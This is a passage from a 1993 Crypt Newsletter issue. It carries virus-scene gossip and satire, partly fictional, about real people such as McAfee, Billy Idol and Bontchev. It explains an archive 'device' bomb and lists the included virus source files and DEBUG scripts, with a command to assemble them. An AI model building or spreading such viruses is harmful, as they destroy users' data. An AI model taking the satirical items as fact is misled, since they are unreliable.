BBS crashes in Oklahoma, according to Lee Jackson's latest Hack Report. Since the bomb is stored within the archive under the filename CON - it is a "device" bomb, rather than a standard ANSI bomb. "Turning off ANSI comments in PKZIP or other unpackers won't stop it . . . unpacking the file causes the device CON to be opened, and the bomb is written straight to it as a result," says The Hack Report, which is as good an explanation as any.] FICTUAL FACT/FACTUAL FICTION: THERE'S NO SECOND CHANCE WHEN DEADLY KUNG FU IS USED FOR EVIL! >>Urnst Kouch stupidly referred to NuKE virus-programmer Rock Steady as French-Canadian in a recent issue of "Gray Areas" magazine. The newsletter regrets this deplorable "ugly Americanism" and is sorry for any mental anguish it may have caused. Rock Steady is not, nor has he ever been, French Canadian. >>The immortal words of the SF Bay Area punk band, "And you'll have to admit, that I'll be rich as shit!" from it's song, "The Money Will Roll Right In" could be applied to John McAfee these days. From a recent business report: "Risk of Viruses Given the Company's high profile in the anti-virus software market, the Company has been a target of computer "crackers" who have created viruses to sabotage the Company's products. While to date these viruses have been discovered quickly and their dissemination limited, there can be no assurance that similar viruses will not be created in the future, that they will not cause damage to users' computer systems and that demand for the Company's software products will not suffer as a result. In addition, since the Company does not control diskettes duplication by shareware distributors or its independent agents, there is no assurance that diskettes containing the Company's software will not be infected. The current list price for a 1,000 computer VIRUSCAN site license is $7,125 The current list price for a 1,000 computer CLEAN-UP site license is $8,910 The current list price for a 1,000 computer VSHIELD site license is $8,910 Revenue for the second quarter of 1993 were $4,340,000, a 28% increase over revenues for the second quarter of the previous year. Net income for the second quarter of 1993 was $1,961,000, a 26% increase over pro forma net income for the second quarter of 1992." Crypt Newsletter financial analyst Cando estimates the following: "John is taking home a base salary of $250,000 and cashed out at the public offering for . . . hold on to your pants . . . a whopping $8,400,000 cash money! McAfee still owns 4,475,000 shares of stock. "Every new virus that is perceived as a threat to Fortune 100 companies will only put more cash into McAfee's pocket. Maybe it's time for NuKE to cash in on some of this corporate fisc?" >>Freshly weaned "cyberpunk" Billy Idol has been deemed a wuss by the computer underground. His recent release, "Cyberpunk," has earned praise from the computer underground along the lines of "He makes lots of money producing meaningless noise. We have to bash him. It's the great American past-time." This summer, Idol has had better luck with hookers than hi-tech computing, being unable to distance himself from Hollywood infame after being linked to "madame-to-the stars-and-assorted-perverted-rich- coke-snuffling-studio-execs" Heidi Fleiss. Fleiss has been associated/seen with Idol, movie producers with a taste for defecating upon dates and an "east coast" computer entrepeneur who likes to use horsewhips. Call Leisure Suit Larry! >>CARO member Vesselin Bontchev and Bulgarian virus programmer, The Dark Avenger, have teamed up in an effort to sell the movie rights to their first hi-tech screenplay, "The Swizzler." "The Swizzler," now being flogged to various agents in Burbank, CA, is a high-tech thriller set in the near future where a mysterious computer virus called "The Swizzler" has decimated the world's banking institutions after escaping from a laboratory in Los Alamos, NM. With America on its knees, the Computer Emergency Response Team rushes on an overnite jet to Bettguano, Bulgaria, to recruit the Avenger (playing himself) in a last ditch race against the clock to halt "The Swizzler" before the computer scourge activates and sends the Doomsday launch codes to the ICBM fields. Bontchev and The Dark Avenger also flew to Cannes, sponsored by the Bulgarian bubbly wine company Champipple, for a press the flesh campaign. >>The Dutch virus research group, TridenT, is working on a new electronic magazine, tentatively named "TridenTial". This, in the face of new "anti-virus" legislation in the low country which makes it possible to prosecute those proven to be trading computer viruses without "educational" permit. Look for TridenTial soon and stay tuned to this channel. *CAVEAT EMPTOR* What is the Crypt Newsletter? The Crypt Newsletter is an electronic document which delivers deft satire, savage criticism and media analyses on topics of interest to the editor and the computing public. The Crypt Newsletter also reviews anti-virus and security software and republishes digested news of note to users of such. The Crypt Newsletter ALSO supplies analysis and complete source code to many computer viruses made expressly for the newsletter. Source codes and DEBUG scripts of these viruses can corrupt - quickly and irreversibly - the data on an IBM-compatible microcomputer - particularly when handled imperfectly. Ownership of The Crypt Newsletter can damage your reputation, making you unpopular in heavily institutionalized settings, rigid bureaucracy or environments where unsophisticated, self-important computer user groups cohabit. Files included in this issue: CRPTLT.R17 - this electronic document TEST.PAK - Aristotle's PAK "device" bomb demonstrator TREKWAR.ASM - TREKWAR source code YB-X.ASM - YB/Dick Manitoba virus source code and analysis CLUST.ASM - TridenT Cluster virus, advanced stealth example, and analysis VECTOR.ASM - Kohntark's interrupt vector lister utility, in source code YB-X.SCR - scriptfile for YB TREKWAR.SCR - scriptfile for TREKWAR CLUST.SCR - scriptfile for CLUSTER VECTOR.SCR - scriptfile for Kohntark's vector lister To assemble programs in the newsletter directly from scriptfiles, copy the MS-DOS program DEBUG.EXE to your work directory and type: DEBUG <*.scr where *.scr is the scriptfile of interest included in this issue. ------------------------------------------------------------------- So you like the newsletter? Maybe you want more? Maybe you want to meet the avuncular Urnst Kouch in person! You can access him at ukouch@delphi.com, as well as at Crypt InfoSystems: 818-683-0854/14.4. Send all contributions to Other fine BBS's which stock the newsletter are: MICRO INFORMATION SYSTEMS SERVICES 1-805-251-0564 THE HELL PIT 1-708-459-7267 DRAGON'S DEN 1-215-882-1415 RIPCO ][ 1-312-528-5020 AIS 1-304-480-6083 CYBERNETIC VIOLENCE 1-514-425-4540 THE BLACK AXIS/VA. INSTITUTE OF VIRUS RESEARCH 1-804-599-4152 UNPHAMILIAR TERRITORY 1-602-PRI-VATE THE OTHER SIDE 1-512-618-0154 REALM OF THE SHADOW 1-210-783-6526 THE BIT BANK 1-215-966-3812 DIGITAL DECAY 1-714-871-2057 ********************************************************************* Comment within the Crypt Newsletter is copyrighted by Urnst Kouch, 1993. If you choose to reprint sections of it for your own use, you might consider contacting him as a matter of courtesy. *********************************************************************